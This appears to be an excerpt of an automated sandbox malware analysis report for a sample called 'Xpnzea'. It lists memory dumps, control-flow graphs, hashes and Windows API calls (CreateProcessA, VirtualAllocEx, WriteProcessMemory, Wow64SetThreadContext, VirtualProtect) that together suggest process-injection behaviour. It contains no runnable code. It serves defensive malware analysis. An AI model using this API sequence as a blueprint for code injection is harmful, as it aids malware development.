                                              • Snapshot File: hcaresult_6_2_64a0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c594ef5741b935ac34d2dee86589b5ba7d54eb671b300d6f5f2671911c7ffc54
                                              • Instruction ID: 37f62a775e01cc99dadfee6ac2b11833ca14b672ecfc05e90338ade20029f5e7
                                              • Opcode Fuzzy Hash: c594ef5741b935ac34d2dee86589b5ba7d54eb671b300d6f5f2671911c7ffc54
                                              • Instruction Fuzzy Hash: CCD1A374E00218CFDB54DFA9D894B9DBBB2BF89300F1091AAD409AB365DB31AD81CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 618052c-61805ca 2 61805cc-61805e3 0->2 3 6180613-618063b 0->3 2->3 8 61805e5-61805ea 2->8 6 618063d-6180651 3->6 7 6180681-61806d7 3->7 6->7 15 6180653-6180658 6->15 17 61806d9-61806ed 7->17 18 618071d-61807b2 CreateProcessA 7->18 9 61805ec-61805f6 8->9 10 618060d-6180610 8->10 12 61805f8 9->12 13 61805fa-6180609 9->13 10->3 12->13 13->13 16 618060b 13->16 19 618065a-6180664 15->19 20 618067b-618067e 15->20 16->10 17->18 26 61806ef-61806f4 17->26 32 61807bb-6180831 18->32 33 61807b4-61807ba 18->33 21 6180668-6180677 19->21 22 6180666 19->22 20->7 21->21 25 6180679 21->25 22->21 25->20 27 61806f6-6180700 26->27 28 6180717-618071a 26->28 30 6180702 27->30 31 6180704-6180713 27->31 28->18 30->31 31->31 34 6180715 31->34 39 6180841-6180845 32->39 40 6180833-6180837 32->40 33->32 34->28 42 6180855-6180859 39->42 43 6180847-618084b 39->43 40->39 41 6180839 40->41 41->39 45 6180869 42->45 46 618085b-618085f 42->46 43->42 44 618084d 43->44 44->42 48 618086a 45->48 46->45 47 6180861 46->47 47->45 48->48
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0618079F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: cxrl$cxrl
                                              • API String ID: 963392458-3870225167
                                              • Opcode ID: 018d7f779e298dcf43db66021ff317e29858f665b4b307ba6d5e1add62484c1c
                                              • Instruction ID: 63ffb84298ef01151c5278d2eae52aa5bdaaf9d0f38346381c4d790e11dfe9c4
                                              • Opcode Fuzzy Hash: 018d7f779e298dcf43db66021ff317e29858f665b4b307ba6d5e1add62484c1c
                                              • Instruction Fuzzy Hash: 04A102B4D0025CCFDB60DFA9C885BEEBBF1BB49301F149569E858A7280DB748985CF81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 49 6180538-61805ca 51 61805cc-61805e3 49->51 52 6180613-618063b 49->52 51->52 57 61805e5-61805ea 51->57 55 618063d-6180651 52->55 56 6180681-61806d7 52->56 55->56 64 6180653-6180658 55->64 66 61806d9-61806ed 56->66 67 618071d-61807b2 CreateProcessA 56->67 58 61805ec-61805f6 57->58 59 618060d-6180610 57->59 61 61805f8 58->61 62 61805fa-6180609 58->62 59->52 61->62 62->62 65 618060b 62->65 68 618065a-6180664 64->68 69 618067b-618067e 64->69 65->59 66->67 75 61806ef-61806f4 66->75 81 61807bb-6180831 67->81 82 61807b4-61807ba 67->82 70 6180668-6180677 68->70 71 6180666 68->71 69->56 70->70 74 6180679 70->74 71->70 74->69 76 61806f6-6180700 75->76 77 6180717-618071a 75->77 79 6180702 76->79 80 6180704-6180713 76->80 77->67 79->80 80->80 83 6180715 80->83 88 6180841-6180845 81->88 89 6180833-6180837 81->89 82->81 83->77 91 6180855-6180859 88->91 92 6180847-618084b 88->92 89->88 90 6180839 89->90 90->88 94 6180869 91->94 95 618085b-618085f 91->95 92->91 93 618084d 92->93 93->91 97 618086a 94->97 95->94 96 6180861 95->96 96->94 97->97
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0618079F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: cxrl$cxrl
                                              • API String ID: 963392458-3870225167
                                              • Opcode ID: 6c456d6f2934b591df13db128cab660b677a0be3d323a36e4a403ef9deb12938
                                              • Instruction ID: 874b30ffe83d23b3b61bd8ed050c4a4537bcdec5bc486e876e88238e8388c0a3
                                              • Opcode Fuzzy Hash: 6c456d6f2934b591df13db128cab660b677a0be3d323a36e4a403ef9deb12938
                                              • Instruction Fuzzy Hash: 40A102B4D0025CCFDB50DFA9C8857EDBBF1BB49301F149569E858A7280DB748989CF85

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 144 6180fa8-618101b 146 618101d-618102f 144->146 147 6181032-6181093 WriteProcessMemory 144->147 146->147 149 618109c-61810ee 147->149 150 6181095-618109b 147->150 150->149
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06181083
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: cxrl
                                              • API String ID: 3559483778-188254238
                                              • Opcode ID: 1a70a2cdc4922ae02889d5b6e2bc679b1ea3a9ef139ecce23aa028f6d33910ae
                                              • Instruction ID: 065855b9d93b194aab57ecad1276c7c9517121891a525a2fb579a7ec97ea67a5
                                              • Opcode Fuzzy Hash: 1a70a2cdc4922ae02889d5b6e2bc679b1ea3a9ef139ecce23aa028f6d33910ae
                                              • Instruction Fuzzy Hash: D441ABB5D012589FCB10CFAAD981AEEBBF1BB49310F14942AE818B7200C775AA42CF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 155 6180fb0-618101b 157 618101d-618102f 155->157 158 6181032-6181093 WriteProcessMemory 155->158 157->158 160 618109c-61810ee 158->160 161 6181095-618109b 158->161 161->160
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06181083
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: cxrl
                                              • API String ID: 3559483778-188254238
                                              • Opcode ID: 3ec6aef8d41652165c713463725f703e2b58d1e3cd15b740b70d4d3ffd3d5ee2
                                              • Instruction ID: 37a8d814fed82ecaf77c525f955922d83e8aae76d8eb1825de667dedb7774936
                                              • Opcode Fuzzy Hash: 3ec6aef8d41652165c713463725f703e2b58d1e3cd15b740b70d4d3ffd3d5ee2
                                              • Instruction Fuzzy Hash: CC419AB5D012589FDB00CFAAD984ADEFBF1BB49310F14942AE818B7210D775AA45CF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 176 6181498-6181554 VirtualProtect 180 618155d-61815ad 176->180 181 6181556-618155c 176->181 181->180
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06181544
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 544645111-188254238
                                              • Opcode ID: ce00e386bcf0b0ad440c958077b89a57cecdb332315cb7c77e02d55b81de32cb
                                              • Instruction ID: 9cfacf7d1007059ec9172df73c3fec833349598bbc6d79e0b3c96170b2af4559
                                              • Opcode Fuzzy Hash: ce00e386bcf0b0ad440c958077b89a57cecdb332315cb7c77e02d55b81de32cb
                                              • Instruction Fuzzy Hash: 9031CDB5D01258EFCF10CFAAE981AEEFBF5AB09310F14942AE815B7210D735A945CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 195 6180e48-6180f0a VirtualAllocEx 198 6180f0c-6180f12 195->198 199 6180f13-6180f5d 195->199 198->199
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06180EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cxrl
                                              • API String ID: 4275171209-188254238
                                              • Opcode ID: fbc2d75463f8d7fd16cb63bfa2ea0ac0dae072b554b812c53ee7868119402df1
                                              • Instruction ID: 54448ac0f1326ac3c77b2e8ca8fd982d595d8ad2b4fdddf1fde8efef0569035b
                                              • Opcode Fuzzy Hash: fbc2d75463f8d7fd16cb63bfa2ea0ac0dae072b554b812c53ee7868119402df1
                                              • Instruction Fuzzy Hash: D731A6B8D00248DFCF10CFAAD980ADEFBB1BB49310F14942AE814B7210D735A906CF58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 204 6180e50-6180f0a VirtualAllocEx 207 6180f0c-6180f12 204->207 208 6180f13-6180f5d 204->208 207->208
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06180EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cxrl
                                              • API String ID: 4275171209-188254238
                                              • Opcode ID: 1311e0e37aae08685a7d66ad386f296395a52a3592e4293d36cd862ae5cfa670
                                              • Instruction ID: 60be2bf81ba597e08b33541ce538bbd4b87272f032b282acaada72cd0a7e2d9e
                                              • Opcode Fuzzy Hash: 1311e0e37aae08685a7d66ad386f296395a52a3592e4293d36cd862ae5cfa670
                                              • Instruction Fuzzy Hash: 6E31A8B9D00258DFCF10CFAAD980A9EFBB1BB49310F10942AE814B7310D735A906CF58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 213 61808ea-6180950 216 6180952-6180964 213->216 217 6180967-61809af Wow64SetThreadContext 213->217 216->217 219 61809b8-6180a04 217->219 220 61809b1-61809b7 217->220 220->219
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0618099F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: cxrl
                                              • API String ID: 983334009-188254238
                                              • Opcode ID: 0e5079795fb82d6a20907b4ea80b4542bd8411c64a9235563eae76d0602fae7d
                                              • Instruction ID: df70af3308afd818528ec8849e73b0e6e75ddfe0bed34cad9e9df85733a12246
                                              • Opcode Fuzzy Hash: 0e5079795fb82d6a20907b4ea80b4542bd8411c64a9235563eae76d0602fae7d
                                              • Instruction Fuzzy Hash: BC41CDB5D01258DFDB10DFAAD985AEEFBF1BB48310F14802AE418B7240C778A985CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 225 61814a0-6181554 VirtualProtect 228 618155d-61815ad 225->228 229 6181556-618155c 225->229 229->228
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06181544
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 544645111-188254238
                                              • Opcode ID: b724d3542a04972e1760e3d4ef201162e53fc21ba8d42afbcbabb848b4179f19
                                              • Instruction ID: f508142f880e09be438bebad02288b5dea0d8fbaed774ef7f3bb8da7eedf4b9b
                                              • Opcode Fuzzy Hash: b724d3542a04972e1760e3d4ef201162e53fc21ba8d42afbcbabb848b4179f19
                                              • Instruction Fuzzy Hash: 4631C8B5D00258EFCB10CFAAD981AEEFBF1AB09310F14942AE815B7210C739A945CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 234 624d4e8-624d59c VirtualProtect 237 624d5a5-624d5ed 234->237 238 624d59e-624d5a4 234->238 238->237
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0624D58C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657382641.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6240000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 544645111-188254238
                                              • Opcode ID: 534268622cf3c8f577e1872955f6e2a9ea3a28af0b793feecf3cc30093543b10
                                              • Instruction ID: c9fa4844c057f21481fc1b51fe6d34122fe9d98a4cc7224c5a4be74c393d04e0
                                              • Opcode Fuzzy Hash: 534268622cf3c8f577e1872955f6e2a9ea3a28af0b793feecf3cc30093543b10
                                              • Instruction Fuzzy Hash: B931A7B4D00248AFDB14DFAAD980A9EFBB1FF49310F14942AE814B7210DB75A945CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 243 61808f0-6180950 245 6180952-6180964 243->245 246 6180967-61809af Wow64SetThreadContext 243->246 245->246 248 61809b8-6180a04 246->248 249 61809b1-61809b7 246->249 249->248
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0618099F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: cxrl
                                              • API String ID: 983334009-188254238
                                              • Opcode ID: 5aca6616771c19c7b332bc8f276cad520319a4f02c264ea913023047baf3fd15
                                              • Instruction ID: a159e75b4262458576d392b3905e08e979ba54c0857c4b18476f382f8fefc805
                                              • Opcode Fuzzy Hash: 5aca6616771c19c7b332bc8f276cad520319a4f02c264ea913023047baf3fd15
                                              • Instruction Fuzzy Hash: 9C31BAB5D00258DFDB14DFAAD984AEEFBF1BB49310F14802AE418B7240D778A949CF94
                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0624E74F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657382641.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6240000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cxrl
                                              • API String ID: 4275171209-188254238
                                              • Opcode ID: 9580048f36f5b7e5509093c8df996d21a3b101dd330e3d3237f6f2f194d47fdf
                                              • Instruction ID: 331e5df5816c5281fb384aff44ab8bec91c047ff29662dd4195a67893368ad1e
                                              • Opcode Fuzzy Hash: 9580048f36f5b7e5509093c8df996d21a3b101dd330e3d3237f6f2f194d47fdf
                                              • Instruction Fuzzy Hash: DC31B9B8D04248DFDF14CFA9D980A9EFBB1BF49320F14941AE814BB210C735A941CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $B
                                              • API String ID: 0-2922798824
                                              • Opcode ID: fd6c87f4aa9cf58da753880c73932ce62b789207e46fb440aa84377265466aec
                                              • Instruction ID: c8f057f7929f730e221609648697101b7b239534f46a80dfcf978c7aa1c81472
                                              • Opcode Fuzzy Hash: fd6c87f4aa9cf58da753880c73932ce62b789207e46fb440aa84377265466aec
                                              • Instruction Fuzzy Hash: 6611B274D0521CCFDB21DF64C888BECBAB1BF09315F5820AAC509B6660DB791A85CF14
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656414956.0000000006000000.00000040.00000800.00020000.00000000.sdmp, Offset: 06000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6000000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6fc77c551f7541b1bbd5df9b672510da95963574fd57fe2bf91731f6bf1ac5ee
                                              • Instruction ID: 6c940b0e14608a44456a5ec771d141c03c04b7ee422329112443b600ffee60a8
                                              • Opcode Fuzzy Hash: 6fc77c551f7541b1bbd5df9b672510da95963574fd57fe2bf91731f6bf1ac5ee
                                              • Instruction Fuzzy Hash: 9FF2CD70949388DFFB168BA4CC55BAE7FB5AF47300F1440ABE541AB2E2C7785845CB62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 7309b92e5748839a4deb46dfe4fbf4cf6a1255523f1ea529a8cc50a702c47623
                                              • Instruction ID: 505874d2391294e5a969902482bf5e672178e3acb61d43705d59f5b5d6ae9181
                                              • Opcode Fuzzy Hash: 7309b92e5748839a4deb46dfe4fbf4cf6a1255523f1ea529a8cc50a702c47623
                                              • Instruction Fuzzy Hash: 8DD17B35600616CFCB54CF69C4849AABBF6FFC8310B158569E85A9B7A1DB30FC45CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RAb
                                              • API String ID: 0-2248548345
                                              • Opcode ID: 94353438d03d34466049d690f3115da3057518db7992f7e7484d52b6e1ffc9d1
                                              • Instruction ID: e8453b0e4517d491228d72b21f7f7aa6a81d2d0a5ec702f9d3bc16f4c4f35b5e
                                              • Opcode Fuzzy Hash: 94353438d03d34466049d690f3115da3057518db7992f7e7484d52b6e1ffc9d1
                                              • Instruction Fuzzy Hash: 2E51DF75E01208DFDB58DFB9D984AADBBB2FF88300F20802AD416AB264DB359945CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: R
                                              • API String ID: 0-1466425173
                                              • Opcode ID: b254e35e49679faad79b1d792754d528b9655fb00e2d3c788393d20f8b99b3e9
                                              • Instruction ID: 73383c9140b8a3f0c9f0de4fb1ee644aa135554dcece5ace5800f75aaa8c3801
                                              • Opcode Fuzzy Hash: b254e35e49679faad79b1d792754d528b9655fb00e2d3c788393d20f8b99b3e9
                                              • Instruction Fuzzy Hash: 5421C87495122CCFDBA0EF24C854BA9BBB2FF99300F0445D9D409A33A0DB365E948F45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: _
                                              • API String ID: 0-701932520
                                              • Opcode ID: e22b14746ae8d872e00a07133c90d48b6e0a9999d165e0355098588e1ff0b3ff
                                              • Instruction ID: 2282230326745f32e06b8c0aa6607119070ec9f9f45a968c1e0c5df9a10be8b1
                                              • Opcode Fuzzy Hash: e22b14746ae8d872e00a07133c90d48b6e0a9999d165e0355098588e1ff0b3ff
                                              • Instruction Fuzzy Hash: CFF0B770814729CFEB60DF18DC48BAABBB6BF05346F0055E5E10AA2260DB381E84CF01
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: K
                                              • API String ID: 0-856455061
                                              • Opcode ID: 6b5c2e6417e0a6f09179d912c69be7759f161b1a14eae1dffe2c28d10585e072
                                              • Instruction ID: d1be2a7a1bc1ff00a6fc90eb51ebb27580c8e4cbbece07d327a548592b9daeda
                                              • Opcode Fuzzy Hash: 6b5c2e6417e0a6f09179d912c69be7759f161b1a14eae1dffe2c28d10585e072
                                              • Instruction Fuzzy Hash: 28F09274A022288FDBA0EF14DD88AADB7B6EF48300F5051D9D80DA3325DB356E90CF50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11f309593ccdc4654c35236a92ee0ffd3d91bfeeaf237d794095d85fc2883fde
                                              • Instruction ID: 6a97a094607de2c8e51b68cc665bd6b001f77511614fff7f1b8984641134074f
                                              • Opcode Fuzzy Hash: 11f309593ccdc4654c35236a92ee0ffd3d91bfeeaf237d794095d85fc2883fde
                                              • Instruction Fuzzy Hash: 0B52F875A002289FDBA4DB69C985BDDBBF2BF88300F5581D9E509A7351DB309E80CF61
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9505fcdc54e20f28adadd0aaa8cfc1847826727b24954223e9d43839acf9dd0
                                              • Instruction ID: 538bc916a016eacaec023e3c23ca164a91277d4f43773322b17d978a8837ef35
                                              • Opcode Fuzzy Hash: a9505fcdc54e20f28adadd0aaa8cfc1847826727b24954223e9d43839acf9dd0
                                              • Instruction Fuzzy Hash: 2422A235A502159FDB44DF68D491AADBBF2FF88310F148069E905EB3A1DB72ED80CB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f39e808f035d15006241e201cfb982cb8446a0fd52f912861b30c44e88a3becd
                                              • Instruction ID: d79fc51b22a893eb780d64da892d40475f67c4ba2e3339d189580651542c3760
                                              • Opcode Fuzzy Hash: f39e808f035d15006241e201cfb982cb8446a0fd52f912861b30c44e88a3becd
                                              • Instruction Fuzzy Hash: CF129034A002159FDB95DFA9C884AAEBBF2FF88300F14852DE406AB351DB71ED45CB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58d168bab7efdf3269f861479bcf92e1cb9b7f41c28b3969c58200b3d198c04d
                                              • Instruction ID: d653ab904b4b0b3bb3bf28ca4a1d3daedb48659ee002812d3a6d9bcca9b2071c
                                              • Opcode Fuzzy Hash: 58d168bab7efdf3269f861479bcf92e1cb9b7f41c28b3969c58200b3d198c04d
                                              • Instruction Fuzzy Hash: 8D12F034A4022A8FCB94DF64C994B9DBBB2BF89300F5185A8D54AAB355DF70ED85CF40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cea8df800387e7029f698cb6a0ed6acdfd91794ee4e6553929d8a32ba2a23b9
                                              • Instruction ID: 1aec1da9df8713b465784473ed064837712661f6b50c42f0acbea5548ff1e539
                                              • Opcode Fuzzy Hash: 6cea8df800387e7029f698cb6a0ed6acdfd91794ee4e6553929d8a32ba2a23b9
                                              • Instruction Fuzzy Hash: E3F15734A40219DFCB45EFA4D89499EBBB2FF89300F508569E805AB365DF30ED85CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: edfbe844face20b35d4e7ad5373e284385292be407cf14ea6d05c756e0ea977e
                                              • Instruction ID: 345c6a4d884ca402e6db78fea81584faa8d5a65705131c7da38009998e304c7d
                                              • Opcode Fuzzy Hash: edfbe844face20b35d4e7ad5373e284385292be407cf14ea6d05c756e0ea977e
                                              • Instruction Fuzzy Hash: E1F1D934A40219DFDB48DFA4D994AADBBB2FF89305F118158E905AB365DF70EC82CB40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656414956.0000000006000000.00000040.00000800.00020000.00000000.sdmp, Offset: 06000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6000000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5d29ade05fbcd946e8d4113a8d5025a2f48383b4fff2727c2abd2519a8e5cfd
                                              • Instruction ID: 1f2811c020c69ff3283a4dc5983df02c89dfc7c92570c85487e86b899f0479b8
                                              • Opcode Fuzzy Hash: e5d29ade05fbcd946e8d4113a8d5025a2f48383b4fff2727c2abd2519a8e5cfd
                                              • Instruction Fuzzy Hash: E0F1D134D01208DFEB98DFE5E9846ACBBB2FF89305F20516AE416A7390DB305985CF41
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5ded77931032da4029c614e42ba6cee5e0c4415c7dad685d475f84883f6f6c2
                                              • Instruction ID: 477fa0d0337f8fcb192a1f9f354e6b15ec63d0a14c87fdba4a664bf24eb974ab
                                              • Opcode Fuzzy Hash: b5ded77931032da4029c614e42ba6cee5e0c4415c7dad685d475f84883f6f6c2
                                              • Instruction Fuzzy Hash: 61C16075A002289FDB98DB69C945BDDBBF6BF88700F148099E509AB351CB70DD81CF61
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e5c1471c34b9c4d7848a28b43dac234cf982ad1a54b9551a6047762d7116621
                                              • Instruction ID: be394a6ce965a61b3c0ae3e2c3275d4d46c0e436372ba52d9b28ffaf0ff2a13a
                                              • Opcode Fuzzy Hash: 1e5c1471c34b9c4d7848a28b43dac234cf982ad1a54b9551a6047762d7116621
                                              • Instruction Fuzzy Hash: 0AA1BF39B412159FCB45CFA9D985AADBBF2FF88311F14806AE811EB291CB35DE41CB50
                                              Memory Dump Source
